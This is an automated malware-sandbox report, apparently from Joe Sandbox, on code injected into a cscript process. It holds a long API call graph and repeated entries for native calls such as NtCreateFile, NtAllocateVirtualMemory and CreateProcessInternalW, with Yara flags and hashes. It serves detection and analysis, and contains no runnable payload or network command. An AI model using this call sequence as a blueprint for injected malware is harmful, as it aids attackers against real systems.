2dbcf30 2 API calls 99915->99916 99918 2db4205 99916->99918 99917->99913 99919 2dbd060 3 API calls 99918->99919 99926 2db423f 99918->99926 99919->99918 99922 2dbcf90 2 API calls 99923 2db433e 99922->99923 99924 2dbcf90 2 API calls 99923->99924 99925 2db4348 99924->99925 99927 2dbcf90 2 API calls 99925->99927 100034 2dbcf90 99926->100034 99928 2db4352 99927->99928 99929 2dbcf90 2 API calls 99928->99929 99929->99930 99930->99790 99932 2db53a1 99931->99932 99933 2db4a50 8 API calls 99932->99933 99935 2db53b7 99933->99935 99934 2db540a 99934->99794 99935->99934 99936 2db53f2 99935->99936 99937 2db5405 99935->99937 99938 2dbbdc0 2 API calls 99936->99938 99939 2dbbdc0 2 API calls 99937->99939 99940 2db53f7 99938->99940 99939->99934 99940->99794 100044 2dbac30 99941->100044 99944 2dbac30 LdrLoadDll 99945 2dbad8d 99944->99945 99946 2dbac30 LdrLoadDll 99945->99946 99947 2dbad96 99946->99947 99948 2dbac30 LdrLoadDll 99947->99948 99949 2dbad9f 99948->99949 99950 2dbac30 LdrLoadDll 99949->99950 99951 2dbada8 99950->99951 99952 2dbac30 LdrLoadDll 99951->99952 99953 2dbadb1 99952->99953 99954 2dbac30 LdrLoadDll 99953->99954 99955 2dbadbd 99954->99955 99956 2dbac30 LdrLoadDll 99955->99956 99957 2dbadc6 99956->99957 99958 2dbac30 LdrLoadDll 99957->99958 99959 2dbadcf 99958->99959 99960 2dbac30 LdrLoadDll 99959->99960 99961 2dbadd8 99960->99961 99962 2dbac30 LdrLoadDll 99961->99962 99963 2dbade1 99962->99963 99964 2dbac30 LdrLoadDll 99963->99964 99965 2dbadea 99964->99965 99966 2dbac30 LdrLoadDll 99965->99966 99967 2dbadf6 99966->99967 99968 2dbac30 LdrLoadDll 99967->99968 99969 2dbadff 99968->99969 99970 2dbac30 LdrLoadDll 99969->99970 99971 2dbae08 99970->99971 99972 2dbac30 LdrLoadDll 99971->99972 99973 2dbae11 99972->99973 99974 2dbac30 LdrLoadDll 99973->99974 99975 2dbae1a 99974->99975 99976 2dbac30 LdrLoadDll 99975->99976 99977 2dbae23 99976->99977 99978 2dbac30 LdrLoadDll 99977->99978 99979 2dbae2f 99978->99979 99980 2dbac30 LdrLoadDll 99979->99980 99981 2dbae38 99980->99981 
99982 2dbac30 LdrLoadDll 99981->99982 99983 2dbae41 99982->99983 99984 2dbac30 LdrLoadDll 99983->99984 99985 2dbae4a 99984->99985 99986 2dbac30 LdrLoadDll 99985->99986 99987 2dbae53 99986->99987 99988 2dbac30 LdrLoadDll 99987->99988 99989 2dbae5c 99988->99989 99990 2dbac30 LdrLoadDll 99989->99990 99991 2dbae68 99990->99991 99992 2dbac30 LdrLoadDll 99991->99992 99993 2dbae71 99992->99993 99994 2dbac30 LdrLoadDll 99993->99994 99995 2dbae7a 99994->99995 99996 2dbac30 LdrLoadDll 99995->99996 99997 2dbae83 99996->99997 99998 2dbac30 LdrLoadDll 99997->99998 99999 2dbae8c 99998->99999 100000 2dbac30 LdrLoadDll 99999->100000 100001 2dbae95 100000->100001 100002 2dbac30 LdrLoadDll 100001->100002 100003 2dbaea1 100002->100003 100004 2dbac30 LdrLoadDll 100003->100004 100005 2dbaeaa 100004->100005 100006 2dbac30 LdrLoadDll 100005->100006 100007 2dbaeb3 100006->100007 100008 2dbac30 LdrLoadDll 100007->100008 100009 2dbaebc 100008->100009 100010 2dbac30 LdrLoadDll 100009->100010 100011 2dbaec5 100010->100011 100012 2dbac30 LdrLoadDll 100011->100012 100013 2dbaece 100012->100013 100014 2dbac30 LdrLoadDll 100013->100014 100015 2dbaeda 100014->100015 100016 2dbac30 LdrLoadDll 100015->100016 100017 2dbaee3 100016->100017 100018 2dbac30 LdrLoadDll 100017->100018 100019 2dbaeec 100018->100019 100019->99798 100021 2dbaf60 LdrLoadDll 100020->100021 100022 2db9edc 100021->100022 100050 4f42df0 LdrInitializeThunk 100022->100050 100023 2db9ef3 100023->99719 100025->99795 100027 2dbaf60 LdrLoadDll 100026->100027 100028 2dba55c NtAllocateVirtualMemory 100027->100028 100028->99898 100030 2dbcf40 100029->100030 100031 2dbcf46 100029->100031 100030->99903 100032 2dbbf90 2 API calls 100031->100032 100033 2dbcf6c 100032->100033 100033->99903 100035 2dbbdc0 2 API calls 100034->100035 100036 2db4334 100035->100036 100036->99922 100037->99907 100039 2dbcfd0 100038->100039 100040 2dbd02d 100039->100040 100041 2dbbf90 2 API calls 100039->100041 100040->99907 100042 2dbd00a 100041->100042 100043 
2dbbdc0 2 API calls 100042->100043 100043->100040 100045 2dbac4b 100044->100045 100046 2db4e50 LdrLoadDll 100045->100046 100047 2dbac6b 100046->100047 100048 2db4e50 LdrLoadDll 100047->100048 100049 2dbad17 100047->100049 100048->100049 100049->99944 100050->100023 100052 4f42c11 100051->100052 100053 4f42c1f LdrInitializeThunk 100051->100053 100052->99804 100053->99804 100055 2dbaf60 LdrLoadDll 100054->100055 100056 2dba68c RtlFreeHeap 100055->100056 100056->99808 100058 2da7eab 100057->100058 100059 2da7eb0 100057->100059 100058->99727 100060 2dbbd40 2 API calls 100059->100060 100061 2da7ed5 100060->100061 100062 2da7f38 100061->100062 100063 2db9ec0 2 API calls 100061->100063 100064 2da7f3e 100061->100064 100069 2dbbd40 2 API calls 100061->100069 100073 2dba5c0 100061->100073 100062->99727 100063->100061 100066 2da7f64 100064->100066 100067 2dba5c0 2 API calls 100064->100067 100066->99727 100068 2da7f55 100067->100068 100068->99727 100069->100061 100071 2da817e 100070->100071 100072 2dba5c0 2 API calls 100070->100072 100071->99683 100072->100071 100074 2dbaf60 LdrLoadDll 100073->100074 100075 2dba5dc 100074->100075 100078 4f42c70 LdrInitializeThunk 100075->100078 100076 2dba5f3 100076->100061 100078->100076 100080 2dbb5c3 100079->100080 100083 2daacf0 100080->100083 100084 2daad14 100083->100084 100085 2da9c4a 100084->100085 100086 2daad50 LdrLoadDll 100084->100086 100085->99690 100086->100085 100088 2dab063 100087->100088 100090 2dab0e0 100088->100090 100102 2db9c90 LdrLoadDll 100088->100102 100090->99697 100092 2dbaf60 LdrLoadDll 100091->100092 100093 2daf1bb 100092->100093 100093->99700 100094 2dba7d0 100093->100094 100095 2dbaf60 LdrLoadDll 100094->100095 100096 2dba7ef LookupPrivilegeValueW 100095->100096 100096->99702 100098 2dba27c 100097->100098 100099 2dbaf60 LdrLoadDll 100097->100099 100103 4f42ea0 LdrInitializeThunk 100098->100103 100099->100098 100100 2dba29b 100100->99703 100102->100090 100103->100100 100105 2dab1f0 100104->100105 100106 2dab040 
LdrLoadDll 100105->100106 100107 2dab204 100106->100107 100107->99636 100109 2daaf34 100108->100109 100181 2db9c90 LdrLoadDll 100109->100181 100111 2daaf6e 100111->99638 100113 2daf3ac 100112->100113 100114 2dab1c0 LdrLoadDll 100113->100114 100115 2daf3be 100114->100115 100182 2daf290 100115->100182 100118 2daf3d9 100119 2dba490 2 API calls 100118->100119 100121 2daf3e4 100118->100121 100119->100121 100120 2daf3f1 100122 2dba490 2 API calls 100120->100122 100123 2daf402 100120->100123 100121->99642 100122->100123 100123->99642 100125 2daf43c 100124->100125 100201 2dab2b0 100125->100201 100127 2daf44e 100128 2daf290 3 API calls 100127->100128 100129 2daf45f 100128->100129 100130 2daf469 100129->100130 100131 2daf481 100129->100131 100132 2dba490 2 API calls 100130->100132 100133 2daf474 100130->100133 100134 2dba490 2 API calls 100131->100134 100135 2daf492 100131->100135 100132->100133 100133->99644 100134->100135 100135->99644 100137 2dacaa6 100136->100137 100138 2dacab0 100136->100138 100137->99652 100139 2daaf10 LdrLoadDll 100138->100139 100140 2dacb4e 100139->100140 100141 2dacb74 100140->100141 100142 2dab040 LdrLoadDll 100140->100142 100141->99652 100143 2dacb90 100142->100143 100144 2db4a50 8 API calls 100143->100144 100145 2dacbe5 100144->100145 100145->99652 100147 2dad646 100146->100147 100148 2dab040 LdrLoadDll 100147->100148 100149 2dad65a 100148->100149 100205 2dad310 100149->100205 100151 2da908b 100152 2dacc00 100151->100152 100153 2dacc26 100152->100153 100154 2dab040 LdrLoadDll 100153->100154 100155 2dacca9 100153->100155 100154->100155 100156 2dab040 LdrLoadDll 100155->100156 100157 2dacd16 100156->100157 100158 2daaf10 LdrLoadDll 100157->100158 100159 2dacd7f 100158->100159 100160 2dab040 LdrLoadDll 100159->100160 100161 2dace2f 100160->100161 100161->99664 100165 2da8d14 100162->100165 100234 2daf6d0 100162->100234 100164 2da8f25 100164->99621 100165->100164 100239 2db43a0 100165->100239 100167 2da8d70 100167->100164 100242 2da8ab0 
100167->100242 100170 2dbcf30 2 API calls 100171 2da8db2 100170->100171 100172 2dbd060 3 API calls 100171->100172 100176 2da8dc7 100172->100176 100173 2da7ea0 4 API calls 100173->100176 100176->100164 100176->100173 100177 2dac7b0 19 API calls 100176->100177 100178 2da8160 2 API calls 100176->100178 100247 2daf670 100176->100247 100251 2daf080 21 API calls 100176->100251 100177->100176 100178->100176 100179->99640 100180->99663 100181->100111 100183 2daf2aa 100182->100183 100184 2daf360 100182->100184 100185 2dab040 LdrLoadDll 100183->100185 100184->100118 100184->100120 100186 2daf2cc 100185->100186 100192 2db9f40 100186->100192 100188 2daf30e 100195 2db9f80 100188->100195 100191 2dba490 2 API calls 100191->100184 100193 2dbaf60 LdrLoadDll 100192->100193 100194 2db9f5c 100193->100194 100194->100188 100196 2dbaf60 LdrLoadDll 100195->100196 100197 2db9f9c 100196->100197 100200 4f435c0 LdrInitializeThunk 100197->100200 100198 2daf354 100198->100191 100200->100198 100202 2dab2d7 100201->100202 100203 2dab040 LdrLoadDll 100202->100203 100204 2dab313 100203->100204 100204->100127 100206 2dad327 100205->100206 100214 2daf710 100206->100214 100210 2dad39b 100211 2dad3a2 100210->100211 100225 2dba2a0 LdrLoadDll 100210->100225 100211->100151 100213 2dad3b5 100213->100151 100215 2daf735 100214->100215 100226 2da81a0 100215->100226 100217 2daf759 100218 2dad36f 100217->100218 100219 2db4a50 8 API calls 100217->100219 100221 2dbbdc0 2 API calls 100217->100221 100233 2daf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 100217->100233 100222 2dba6e0 100218->100222 100219->100217 100221->100217 100223 2dbaf60 LdrLoadDll 100222->100223 100224 2dba6ff CreateProcessInternalW 100223->100224 100224->100210 100225->100213 100227 2da829f 100226->100227 100228 2da81b5 100226->100228 100227->100217 100228->100227 100229 2db4a50 8 API calls 100228->100229 100230 2da8222 100229->100230 100231 2dbbdc0 2 API calls 100230->100231 100232 2da8249 100230->100232 100231->100232 
100232->100217 100233->100217 100235 2db4e50 LdrLoadDll 100234->100235 100236 2daf6ef 100235->100236 100237 2daf6fd 100236->100237 100238 2daf6f6 SetErrorMode 100236->100238 100237->100165 100238->100237 100252 2daf4a0 100239->100252 100241 2db43c6 100241->100167 100243 2dbbd40 2 API calls 100242->100243 100246 2da8ad5 100243->100246 100244 2da8cea 100244->100170 100246->100244 100271 2db9880 100246->100271 100248 2daf683 100247->100248 100322 2db9e90 100248->100322 100251->100176 100253 2daf4bd 100252->100253 100259 2db9fc0 100253->100259 100256 2daf505 100256->100241 100260 2dbaf60 LdrLoadDll 100259->100260 100261 2db9fdc 100260->100261 100269 4f42f30 LdrInitializeThunk 100261->100269 100262 2daf4fe 100262->100256 100264 2dba010 100262->100264 100265 2dbaf60 LdrLoadDll 100264->100265 100266 2dba02c 100265->100266 100270 4f42d10 LdrInitializeThunk 100266->100270 100267 2daf52e 100267->100241 100269->100262 100270->100267 100272 2dbbf90 2 API calls 100271->100272 100273 2db9897 100272->100273 100292 2da9310 100273->100292 100275 2db98b2 100276 2db98d9 100275->100276 100277 2db98f0 100275->100277 100278 2dbbdc0 2 API calls 100276->100278 100280 2dbbd40 2 API calls 100277->100280 100279 2db98e6 100278->100279 100279->100244 100281 2db992a 100280->100281 100282 2dbbd40 2 API calls 100281->100282 100283 2db9943 100282->100283 100289 2db9be4 100283->100289 100298 2dbbd80 LdrLoadDll 100283->100298 100285 2db9bc9 100286 2db9bd0 100285->100286 100285->100289 100287 2dbbdc0 2 API calls 100286->100287 100288 2db9bda 100287->100288 100288->100244 100290 2dbbdc0 2 API calls 100289->100290 100291 2db9c39 100290->100291 100291->100244 100293 2da9335 100292->100293 100294 2daacf0 LdrLoadDll 100293->100294 100295 2da9368 100294->100295 100297 2da938d 100295->100297 100299 2dacf20 100295->100299 100297->100275 100298->100285 100300 2dacf4c 100299->100300 100301 2dba1e0 LdrLoadDll 100300->100301 100303 2dacf65 100301->100303 100302 2dacf6c 100302->100297 100303->100302 100310 
2dba220 100303->100310 100305 2dacf8f 100305->100302 100317 2dba810 100305->100317 100307 2dacfa7 100308 2dba490 2 API calls 100307->100308 100309 2dacfca 100308->100309 100309->100297 100311 2dba23c 100310->100311 100312 2dbaf60 LdrLoadDll 100310->100312 100320 4f42ca0 LdrInitializeThunk 100311->100320 100312->100311 100313 2dba257 100313->100305 100321 4f42ea0 LdrInitializeThunk 100313->100321 100314 2dba29b 100314->100305 100318 2dbaf60 LdrLoadDll 100317->100318 100319 2dba82f 100318->100319 100319->100307 100320->100313 100321->100314 100323 2dbaf60 LdrLoadDll 100322->100323 100324 2db9eac 100323->100324 100327 4f42dd0 LdrInitializeThunk 100324->100327 100325 2daf6ae 100325->100176 100327->100325 100328 2db9080 100329 2dbbd40 2 API calls 100328->100329 100331 2db90bb 100329->100331 100330 2db919c 100331->100330 100332 2daacf0 LdrLoadDll 100331->100332 100333 2db90f1 100332->100333 100334 2db4e50 LdrLoadDll 100333->100334 100336 2db910d 100334->100336 100335 2db9120 Sleep 100335->100336 100336->100330 100336->100335 100339 2db8ca0 LdrLoadDll 100336->100339 100340 2db8eb0 LdrLoadDll 100336->100340 100339->100336 100340->100336

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 283 2dba360-2dba376 284 2dba37c-2dba3b1 NtCreateFile 283->284 285 2dba377 call 2dbaf60 283->285 285->284
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DB4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DB4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DBA3AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: d4c3ba9ab10a5344ba0ee37dfeaa478d9d51a5202811c3753324c1335af96f4d
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: A3F0BDB2200208ABCB08CF88DC94EEB77ADEF8C754F158248BA0D97240C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 286 2dba35c-2dba3b1 call 2dbaf60 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02DB4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DB4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DBA3AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                            • Instruction ID: 2c98f333340c062494bfefbd94bbf21046d7a052ab077987f16bb6710d1b7778
                                                                            • Opcode Fuzzy Hash: 0f551066871a270168d0ff2483714f43a096202a8d74b98515230281910a7744
                                                                            • Instruction Fuzzy Hash: D4F014B2214148ABCB08DF98D884CEB77A9FF8C354B14864DFA0D93205D630E851CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 551 2dba53a-2dba53b 552 2dba53d-2dba53f 551->552 553 2dba501-2dba539 call 2dbaf60 551->553 555 2dba541-2dba556 552->555 556 2dba596-2dba5b9 call 2dbaf60 552->556 558 2dba55c-2dba57d NtAllocateVirtualMemory 555->558 559 2dba557 call 2dbaf60 555->559 559->558
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DA2D11,00002000,00003000,00000004), ref: 02DBA579
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 340c91485a91ffe9901b58f0b9a32dcfdfc1a96d9001fd14dcfed535198d9d5e
                                                                            • Instruction ID: 72b732e7b47fbf4db3dd80c9fd600cdef9916b0023c7adca29ee21130565a57d
                                                                            • Opcode Fuzzy Hash: 340c91485a91ffe9901b58f0b9a32dcfdfc1a96d9001fd14dcfed535198d9d5e
                                                                            • Instruction Fuzzy Hash: 902113B6200209ABCB18DF88DC95EEB77ADEF8C754F108559BE1997341C630E821CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(02DB4D72,5EB65239,FFFFFFFF,02DB4A31,?,?,02DB4D72,?,02DB4A31,FFFFFFFF,5EB65239,02DB4D72,?,00000000), ref: 02DBA455
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 7712c25b291b438d8d078cac26bc11ebe42db57706a92fec38714054b22c79e1
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: D0F0A4B2200208ABCB14DF89DC94EEB77ADEF8C754F158248BA1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtReadFile.NTDLL(02DB4D72,5EB65239,FFFFFFFF,02DB4A31,?,?,02DB4D72,?,02DB4A31,FFFFFFFF,5EB65239,02DB4D72,?,00000000), ref: 02DBA455
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                            • Instruction ID: cccbcdab24c484a0add021d17146e8e2e4b986cc7108afce1f0ab78e242f96d2
                                                                            • Opcode Fuzzy Hash: bf50eeb7deebf2a486485ec1f43aa719086f10b8b0234e11c84567ca45339589
                                                                            • Instruction Fuzzy Hash: D7F01DB2114049AFCB05DF98D890CEBB7ADEF8C214B15864DF95D97201C630E855CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02DA2D11,00002000,00003000,00000004), ref: 02DBA579
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: aaf179cbca8cb56720a834a658258c9924263d7506188cff85cfc1f6bb3c16d0
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: 30F015B2200208ABCB14DF89CC80EEB77ADEF8C754F118148BE0997241C630F810CBB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • NtClose.NTDLL(02DB4D50,?,?,02DB4D50,00000000,FFFFFFFF), ref: 02DBA4B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2da0000_cscript.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FF9000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.0000000004FFD000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_4ed0000_cscript.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: true
